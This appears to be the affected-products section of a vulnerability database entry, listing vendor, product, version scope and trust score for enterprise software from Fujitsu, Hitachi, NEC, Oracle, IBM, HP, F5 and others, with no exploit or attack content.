vendor:富士通model:interstagescope:eqversion:application development cycle manager

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:application framework suite

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:application server

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:apworks

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:business application server

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:job workload server

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:service integrator

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:studio

Trust: 0.8

vendor:富士通model:interstage application development cycle managerscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage application framework suitescope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage application serverscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage apworksscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage business application serverscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage job workload serverscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage service integratorscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage studioscope:eqversion: -

Trust: 0.8

vendor:富士通model:serverviewscope:eqversion:resource orchestrator

Trust: 0.8

vendor:富士通model:symfowarescope:eqversion:analytics server

Trust: 0.8

vendor:富士通model:symfowarescope:eqversion:server

Trust: 0.8

vendor:富士通model:systemwalker service catalog managerscope:eqversion: -

Trust: 0.8

vendor:富士通model:systemwalker service quality coordinatorscope:eqversion: -

Trust: 0.8

vendor:富士通model:systemwalker software configuration managerscope:eqversion: -

Trust: 0.8

vendor:富士通model:triolescope:eqversion:cloud middle set b set

Trust: 0.8

vendor:日立model:hitachi device managerscope:eqversion:software

Trust: 0.8

vendor:日立model:hitachi global link managerscope:eqversion:software

Trust: 0.8

vendor:日立model:job management partner 1/performance management - web consolescope:eqversion: -

Trust: 0.8

vendor:日立model:jp1/performance managementscope:eqversion:- manager web option

Trust: 0.8

vendor:日立model:jp1/performance managementscope:eqversion:- web console

Trust: 0.8

vendor:日立model:hitachi replication managerscope:eqversion:software

Trust: 0.8

vendor:日立model:hitachi tiered storage managerscope:eqversion:software

Trust: 0.8

vendor:日立model:hitachi tuning managerscope:eqversion:software

Trust: 0.8

vendor:ヒューレット パッカードmodel:hp device managerscope:eqversion: -

Trust: 0.8

vendor:ヒューレット パッカードmodel:hp xp7scope:eqversion:global link manager software

Trust: 0.8

vendor:ヒューレット パッカードmodel:hp xp p9000scope:eqversion:replication manager

Trust: 0.8

vendor:ヒューレット パッカードmodel:hp xp p9000scope:eqversion:tiered storage manager

Trust: 0.8

vendor:ibmmodel:connectionsscope:lteversion:3.0.1.1

Trust: 0.8

vendor:ibmmodel:lotus expeditorscope:eqversion:6.1.x

Trust: 0.8

vendor:ibmmodel:lotus expeditorscope:eqversion:6.2.x

Trust: 0.8

vendor:ibmmodel:lotus mashupsscope:eqversion:2.0.0.2

Trust: 0.8

vendor:ibmmodel:lotus mashupsscope:eqversion:3.0.0.1

Trust: 0.8

vendor:ibmmodel:lotus quickrscope:eqversion:8.5 for websphere portal

Trust: 0.8

vendor:ibmmodel:rational changescope:eqversion:5.2

Trust: 0.8

vendor:ibmmodel:rational changescope:eqversion:5.3

Trust: 0.8

vendor:ibmmodel:rational changescope:eqversion:5.3.1

Trust: 0.8

vendor:ibmmodel:websphere portalscope:eqversion:7

Trust: 0.8

vendor:ibmmodel:websphere portalscope:eqversion:6.1.x

Trust: 0.8

vendor:日本電気model:esmpro/servermanagerscope:lteversion:ver5.75

Trust: 0.8

vendor:日本電気model:infocagescope:eqversion:pc security

Trust: 0.8

vendor:日本電気model:infocagescope:eqversion:security risk management v1.0.0 to v1.0.6

Trust: 0.8

vendor:日本電気model:infocagescope:eqversion:security risk management v1.0.0 to v2.1.3

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:enterprise edition v5.1 to v5.2

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:enterprise edition v6.1 to v6.5

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:rfid manager enterprise v7.1

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:rfid manager lite v2.0

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:rfid manager standard v2.0

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:standard edition v5.1 to v5.2

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:standard edition v6.1 to v6.5

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:standard-j edition v5.1 to v5.2

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:standard-j edition v6.1 to v6.5

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:web edition v5.1 to v5.2

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:web edition v6.1 to v6.5

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:application server v7.1

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:developer v8.2 to v8.4 (with developer's studio only )

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:developer v9.1 to v9.2 (with developer's studio only )

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:portal v8.3 to v8.4

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:portal v9.1

Trust: 0.8

vendor:日本電気model:webotx application serverscope:eqversion:v7.1

Trust: 0.8

vendor:日本電気model:webotx developerscope:eqversion:v8.2 to v8.4 (with developer's studio only )

Trust: 0.8

vendor:日本電気model:webotx developerscope:eqversion:v9.1 to v9.2 (with developer's studio only )

Trust: 0.8

vendor:日本電気model:webotx portalscope:eqversion:v8.3 to v8.4

Trust: 0.8

vendor:日本電気model:webotx portalscope:eqversion:v9.1

Trust: 0.8

vendor:株式会社エヌ ティ ティ データmodel:terasoluna server framework for javascope:lteversion:2.0.0.1 from 2.0.5.1

Trust: 0.8

vendor:オラクルmodel:oracle communications applicationsscope:eqversion:of metasolv solution 6.2.1.0.0

Trust: 0.8

vendor:オラクルmodel:oracle communications applicationsscope:eqversion:of metasolv solution asr: 49.0.0

Trust: 0.8

vendor:オラクルmodel:oracle communications applicationsscope:eqversion:of metasolv solution lsr: 10.1.0

Trust: 0.8

vendor:オラクルmodel:oracle communications applicationsscope:eqversion:of metasolv solution lsr: 9.4.0

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle adaptive access manager 11.1.1.5

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle adaptive access manager 11.1.1.7

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle adaptive access manager 11.1.2.1

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle adaptive access manager 11.1.2.2

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle enterprise data quality 8.1.2

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle enterprise data quality 9.0.11

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle jdeveloper 10.1.3.5

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle jdeveloper 11.1.1.7

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle jdeveloper 11.1.2.4

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle jdeveloper 12.1.2.0

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle jdeveloper 12.1.3.0

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle waveset 8.1.1

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle weblogic portal 10.0.1.0

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle weblogic portal 10.2.1.0

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle weblogic portal 10.3.6.0

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle real-time decision server 11.1.1.7 (rtd platform 3.0.x)

Trust: 0.8

vendor:オラクルmodel:oracle identity managerscope:eqversion:11.1.1.5

Trust: 0.8

vendor:オラクルmodel:oracle identity managerscope:eqversion:11.1.1.7

Trust: 0.8

vendor:オラクルmodel:oracle identity managerscope:eqversion:11.1.2.1

Trust: 0.8

vendor:オラクルmodel:oracle identity managerscope:eqversion:11.1.2.2

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera contract management 13.1

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera contract management 14.0

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera p6 enterprise project portfolio management 7.0

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera p6 enterprise project portfolio management 8.0

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera p6 enterprise project portfolio management 8.1

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera p6 enterprise project portfolio management 8.2

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera p6 enterprise project portfolio management 8.3

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of allocation 10.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of allocation 11.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of allocation 12.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of allocation 13.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of allocation 13.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of allocation 13.2

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 12.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 12.0.9in

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 13.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 13.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 13.2

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 13.3

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 13.4

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 14.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 8.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 12.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 12.0.9in

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 13.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 13.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 13.2

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 13.3

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 13.4

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 14.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 8.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of clearance optimization engine 13.3

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of clearance optimization engine 13.4

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of clearance optimization engine 14.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 11.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 12.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 12.0 in

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 12.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 13.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 13.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 13.2

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 14.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of markdown optimization 12.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of markdown optimization 13.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of markdown optimization 13.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of markdown optimization 13.2

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of markdown optimization 13.4

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of returns management 13.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of returns management 13.2

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of returns management 13.3

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of returns management 13.4

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of returns management 14.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of returns management 2.0

Trust: 0.8

vendor:オラクルmodel:oracle weblogic serverscope:eqversion:10.0.2.0

Trust: 0.8

vendor:オラクルmodel:oracle weblogic serverscope:eqversion:10.3.6.0

Trust: 0.8

vendor:オラクルmodel:oracle weblogic serverscope:eqversion:12.1.1.0

Trust: 0.8

vendor:オラクルmodel:oracle weblogic serverscope:eqversion:12.1.2.0

Trust: 0.8

vendor:オラクルmodel:oracle weblogic serverscope:eqversion:12.1.3.0

Trust: 0.8

vendor:hitachimodel:device manager software )scope:eqversion:6.1-00

Trust: 0.6

vendor:hitachimodel:device manager softwarescope:eqversion:6.1.1-03

Trust: 0.6

vendor:hitachimodel:device manager software )scope:eqversion:6.2-00

Trust: 0.6

vendor:hitachimodel:tiered storage manager software )scope:eqversion:6.1-00

Trust: 0.6

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:6.1.1-00

Trust: 0.6

vendor:hitachimodel:device manager software )scope:eqversion:6.2-01

Trust: 0.6

vendor:hitachimodel:device manager softwarescope:eqversion:6.2-01

Trust: 0.6

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-11-08

Trust: 0.6

vendor:hitachimodel:device manager software )scope:eqversion:6.1.1-00

Trust: 0.6

vendor:hitachimodel:device manager softwarescope:eqversion:6.2-00

Trust: 0.6

vendor:hitachimodel:tiered storage manager software )scope:eqversion:6.1.1-00

Trust: 0.6

vendor:hitachimodel:jp1/performance management manager web optionscope:eqversion:-07-00

Trust: 0.6

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-00-12

Trust: 0.6

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:6.1-00

Trust: 0.6

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:6.2-00

Trust: 0.6

vendor:hitachimodel:device manager softwarescope:eqversion:6.1-03

Trust: 0.6

vendor:hitachimodel:tiered storage manager software )scope:eqversion:6.1-01

Trust: 0.6

vendor:hitachimodel:device manager softwarescope:eqversion:6.1-00

Trust: 0.6

vendor:hitachimodel:tuning manager softwarescope:eqversion:7.6.1-05

Trust: 0.6

vendor:hitachimodel:device manager softwarescope:eqversion:6.1-02

Trust: 0.6

vendor:hitachimodel:device manager software )scope:eqversion:6.1.1-04

Trust: 0.6

vendor:ibmmodel:infosphere information serverscope:eqversion:9.1

Trust: 0.6

vendor:hitachimodel:tiered storage manager software )scope:eqversion:6.1.1-01

Trust: 0.6

vendor:hitachimodel:tuning manager softwarescope:eqversion:7.4.0-02

Trust: 0.6

vendor:hitachimodel:device manager softwarescope:eqversion:6.1.1-00

Trust: 0.6

vendor:hitachimodel:tuning manager softwarescope:eqversion:7.4.0-01

Trust: 0.6

vendor:ibmmodel:infosphere information serverscope:eqversion:8.5

Trust: 0.6

vendor:hitachimodel:device manager softwarescope:eqversion:6.0-06

Trust: 0.6

vendor:hitachimodel:device manager software )scope:eqversion:6.2-02

Trust: 0.6

vendor:hitachimodel:device manager softwarescope:eqversion:6.2-02

Trust: 0.6

vendor:hitachimodel:device manager softwarescope:eqversion:6.0-00

Trust: 0.6

vendor:hitachimodel:tuning manager softwarescope:eqversion:8.0.0-03

Trust: 0.6

vendor:hitachimodel:tiered storage manager software )scope:eqversion:6.2-00

Trust: 0.6

vendor:hitachimodel:tiered storage manager software )scope:eqversion:6.2-01

Trust: 0.6

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:6.2-01

Trust: 0.6

vendor:hitachimodel:tuning manager softwarescope:eqversion:8.0.0-04

Trust: 0.6

vendor:hitachimodel:device manager software )scope:eqversion:6.1-02

Trust: 0.6

vendor:hitachimodel:device manager softwarescope:eqversion:6.1.1-04

Trust: 0.6

vendor:hitachimodel:device manager softwarescope:eqversion:7.0.0-00

Trust: 0.6

vendor:hitachimodel:jp1/performance management manager web optionscope:eqversion:-07-54

Trust: 0.6

vendor:ibmmodel:infosphere information serverscope:eqversion:8.1

Trust: 0.6

vendor:ibmmodel:infosphere information serverscope:eqversion:8.7

Trust: 0.6

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:6.1-01

Trust: 0.6

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-10-08

Trust: 0.6

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:6.1.1-01

Trust: 0.6

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-10-00

Trust: 0.6

vendor:ibmmodel:websphere application serverscope:eqversion:7.0.0.17

Trust: 0.3

vendor:ibmmodel:openpagesscope:eqversion:6.0

Trust: 0.3

vendor:hitachimodel:device manager software (linux(susescope:eqversion:8.0.0-05

Trust: 0.3

vendor:oraclemodel:retail allocationscope:eqversion:13.0

Trust: 0.3

vendor:oraclemodel:primavera p6 enterprise project portfolio managementscope:eqversion:8.1

Trust: 0.3

vendor:ibmmodel:distributed marketingscope:eqversion:8.0

Trust: 0.3

vendor:oraclemodel:utilities frameworkscope:eqversion:4.3.0.3.0

Trust: 0.3

vendor:hitachimodel:device manager software (solaris(spscope:eqversion:6.4.0-07

Trust: 0.3

vendor:hitachimodel:global link manager softwarescope:eqversion:6.6-00

Trust: 0.3

vendor:ibmmodel:security qradarscope:eqversion:7.0

Trust: 0.3

vendor:ibmmodel:tivoli storage manager administration centerscope:eqversion:6.3

Trust: 0.3

vendor:ibmmodel:tivoli workload scheduler z/os connectorscope:eqversion:8.5

Trust: 0.3

vendor:ibmmodel:records managerscope:eqversion:8.5

Trust: 0.3

vendor:oraclemodel:retail clearance optimization enginescope:eqversion:13.4

Trust: 0.3

vendor:oraclemodel:retail back officescope:eqversion:8.0

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:6.401

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:7.0.0-00

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5

Trust: 0.3

vendor:ibmmodel:social media analyticsscope:eqversion:1.3

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-09-00

Trust: 0.3

vendor:ntt datamodel:terasoluna server framework for javascope:neversion:2.0.5.2

Trust: 0.3

vendor:hitachimodel:global link manager softwarescope:eqversion:6.2-00

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:eqversion:7.0.1-02

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf7scope:eqversion:11.1.0

Trust: 0.3

vendor:ibmmodel:lotus expeditorscope:eqversion:6.2

Trust: 0.3

vendor:vmwaremodel:vcenter serverscope:eqversion:5.1

Trust: 0.3

vendor:oraclemodel:primavera p6 enterprise project portfolio managementscope:eqversion:15.1

Trust: 0.3

vendor:ibmmodel:business process manager standardscope:eqversion:8.5.5

Trust: 0.3

vendor:ibmmodel:tivoli application dependency discovery managerscope:eqversion:7.1.2

Trust: 0.3

vendor:hitachimodel:device manager software (linux(rhelscope:eqversion:7.0.0-00

Trust: 0.3

vendor:hitachimodel:device manager software (solaris(x6scope:eqversion:7.6.1-05

Trust: 0.3

vendor:hitachimodel:device manager software (solarisscope:eqversion:6.0-06(x64))

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:3.5.0

Trust: 0.3

vendor:hitachimodel:device manager software (linux(susescope:neversion:8.0.0-06

Trust: 0.3

vendor:redhatmodel:fuse esb enterprisescope:eqversion:7.1.0

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:8.0.43

Trust: 0.3

vendor:ibmmodel:ds8870scope:eqversion:7.0

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:8.0.0-05

Trust: 0.3

vendor:oraclemodel:retail invoice matchingscope:eqversion:12.0

Trust: 0.3

vendor:oraclemodel:knowledgescope:eqversion:8.6.0

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:7.6.1-05

Trust: 0.3

vendor:ibmmodel:rational reporting for development intelligencescope:eqversion:1.0.2

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:7.0.0.13

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:6.1

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(susescope:eqversion:8.0.0-00

Trust: 0.3

vendor:ibmmodel:tivoli endpoint manager for remote controlscope:eqversion:9.0.1

Trust: 0.3

vendor:oraclemodel:retail returns managementscope:eqversion:13.4

Trust: 0.3

vendor:ibmmodel:content analytics with enterprise searchscope:eqversion:2.2

Trust: 0.3

vendor:ibmmodel:business process manager advancedscope:eqversion:7.5.0

Trust: 0.3

vendor:hpmodel:xp p9000 tiered storage managerscope:eqversion:1.1.0-00

Trust: 0.3

vendor:oraclemodel:retail back officescope:eqversion:13.3

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:6.1.0.47

Trust: 0.3

vendor:ibmmodel:websphere portalscope:eqversion:6.1

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:9.1

Trust: 0.3

vendor:ibmmodel:tivoli dynamic workload consolescope:eqversion:8.6.0.0

Trust: 0.3

vendor:oraclemodel:retail back officescope:eqversion:14.0

Trust: 0.3

vendor:debianmodel:linux sparcscope:eqversion:6.0

Trust: 0.3

vendor:susemodel:linux enterprise software development kit sp3scope:eqversion:11

Trust: 0.3

vendor:oraclemodel:utilities frameworkscope:eqversion:4.3.0.1.0

Trust: 0.3

vendor:f5model:big-ip edge gateway hf5scope:eqversion:11.2.1

Trust: 0.3

vendor:ibmmodel:rational insightscope:eqversion:1.1.1

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:8.1

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:8.0

Trust: 0.3

vendor:junipermodel:secure analytics 2013.2r8scope:neversion: -

Trust: 0.3

vendor:ibmmodel:tivoli endpoint manager for remote controlscope:eqversion:8.2

Trust: 0.3

vendor:ibmmodel:tivoli storage productivity centerscope:eqversion:5.1

Trust: 0.3

vendor:hitachimodel:job management partner 1/performance management web consolescope:eqversion:-0

Trust: 0.3

vendor:hitachimodel:device manager software (linux(slesscope:eqversion:7.0.0-00

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:8.0.41

Trust: 0.3

vendor:ibmmodel:content manager records enablerscope:eqversion:8.5

Trust: 0.3

vendor:hitachimodel:device manager software )scope:eqversion:6.0-06

Trust: 0.3

vendor:ibmmodel:tivoli integrated portalscope:eqversion:1.1.1.19

Trust: 0.3

vendor:ibmmodel:openpages grc platformscope:eqversion:6.2.1

Trust: 0.3

vendor:ibmmodel:content navigatorscope:eqversion:2.0.1

Trust: 0.3

vendor:hitachimodel:device manager software )scope:eqversion:7.3-00

Trust: 0.3

vendor:oraclemodel:primavera contract managementscope:eqversion:14.0

Trust: 0.3

vendor:hitachimodel:tuning manager software (linux(rhelscope:eqversion:8.0.0-00

Trust: 0.3

vendor:ibmmodel:openpagesscope:eqversion:7.0

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.2

Trust: 0.3

vendor:ibmmodel:business process manager standardscope:eqversion:8.0.x

Trust: 0.3

vendor:hitachimodel:device manager software (solarisscope:eqversion:6.1.1-04(x64))

Trust: 0.3

vendor:mandrivamodel:business serverscope:eqversion:1

Trust: 0.3

vendor:ibmmodel:tivoli endpoint manager for remote controlscope:eqversion:8.2.1

Trust: 0.3

vendor:oraclemodel:retail back officescope:eqversion:13.1

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:6.1.0.43

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:eqversion:8.0.0-05

Trust: 0.3

vendor:oraclemodel:primavera p6 enterprise project portfolio managementscope:eqversion:7.0

Trust: 0.3

vendor:oraclemodel:weblogic serverscope:eqversion:12.1.10

Trust: 0.3

vendor:redhatmodel:jboss operations networkscope:eqversion:3.2.1

Trust: 0.3

vendor:oraclemodel:primavera p6 enterprise project portfolio managementscope:eqversion:8.3

Trust: 0.3

vendor:hpmodel:device managerscope:eqversion:1.0.0-00

Trust: 0.3

vendor:ibmmodel:content navigatorscope:eqversion:2.0

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:eqversion:7.6.1-05

Trust: 0.3

vendor:hpmodel:xp7 global link manager softwarescope:eqversion:6.4.0-00

Trust: 0.3

vendor:hitachimodel:raplication manager software (linux(rhelscope:eqversion:8.0.0-05

Trust: 0.3

vendor:hpmodel:xp p9000 tiered storage managerscope:eqversion:8.0.0-00

Trust: 0.3

vendor:ibmmodel:websphere partner gateway advanced editionscope:eqversion:6.2

Trust: 0.3

vendor:oraclemodel:weblogic portalscope:eqversion:10.0.1.0

Trust: 0.3

vendor:oraclemodel:retail back officescope:eqversion:13.0

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:8.0.42

Trust: 0.3

vendor:ibmmodel:connectionsscope:eqversion:3.0

Trust: 0.3

vendor:hitachimodel:global link manager softwarescope:eqversion:6.5-00

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:neversion:8.0.0-06

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:eqversion:7.5.0-02

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:hpmodel:sitescopescope:eqversion:11.20

Trust: 0.3

vendor:oraclemodel:primavera contract managementscope:eqversion:13.1

Trust: 0.3

vendor:hpmodel:xp p9000 tiered storage managerscope:eqversion:8.0.0-06

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:10.0

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:6.0.0-00

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:6.2-01

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-10-07

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:7.0.0.27

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (solaris(spscope:eqversion:6.0.0-00

Trust: 0.3

vendor:hitachimodel:device manager software (linux(rhelscope:eqversion:8.0.0-05

Trust: 0.3

vendor:oraclemodel:knowledgescope:eqversion:8.5.1.7

Trust: 0.3

vendor:ibmmodel:websphere lombardi editionscope:eqversion:7.1.0

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:9.0

Trust: 0.3

vendor:ibmmodel:lotus expeditorscope:eqversion:6.2.2

Trust: 0.3

vendor:hitachimodel:device manager software (linux(rhelscope:eqversion:7.6.1-05

Trust: 0.3

vendor:hitachimodel:device manager software (linux(rhelscope:eqversion:6.4.0-07

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:7.5

Trust: 0.3

vendor:ibmmodel:tivoli provisioning managerscope:eqversion:5.1

Trust: 0.3

vendor:f5model:arxscope:eqversion:6.0

Trust: 0.3

vendor:ibmmodel:tivoli storage productivity centerscope:eqversion:4.2.1

Trust: 0.3

vendor:hitachimodel:tuning manager software (linux(susescope:eqversion:8.0.0-00

Trust: 0.3

vendor:ibmmodel:websphere sensor eventsscope:eqversion:7.0

Trust: 0.3

vendor:ibmmodel:openpagesscope:eqversion:6.0.1.5

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:7.1.0

Trust: 0.3

vendor:junipermodel:security threat response managerscope:eqversion:2012.1

Trust: 0.3

vendor:oraclemodel:retail central officescope:eqversion:13.2

Trust: 0.3

vendor:hpmodel:xp p9000 replication managerscope:eqversion:6.0.0-00

Trust: 0.3

vendor:ibmmodel:connectionsscope:eqversion:2.0.10

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:7.2.1-00

Trust: 0.3

vendor:ibmmodel:qradar siem mr2scope:eqversion:7.1

Trust: 0.3

vendor:f5model:arxscope:eqversion:6.4

Trust: 0.3

vendor:ibmmodel:tivoli dynamic workload consolescope:eqversion:8.5

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.1

Trust: 0.3

vendor:ibmmodel:websphere service registry and repositoryscope:eqversion:8.0

Trust: 0.3

vendor:ibmmodel:tivoli workload scheduler distributedscope:eqversion:8.5.1

Trust: 0.3

vendor:ibmmodel:filenet p8 platform content search enginescope:eqversion:5.1

Trust: 0.3

vendor:ibmmodel:tivoli identity managerscope:eqversion:5.0

Trust: 0.3

vendor:ibmmodel:tivoli netcool/omnibus web guiscope:eqversion:7.4

Trust: 0.3

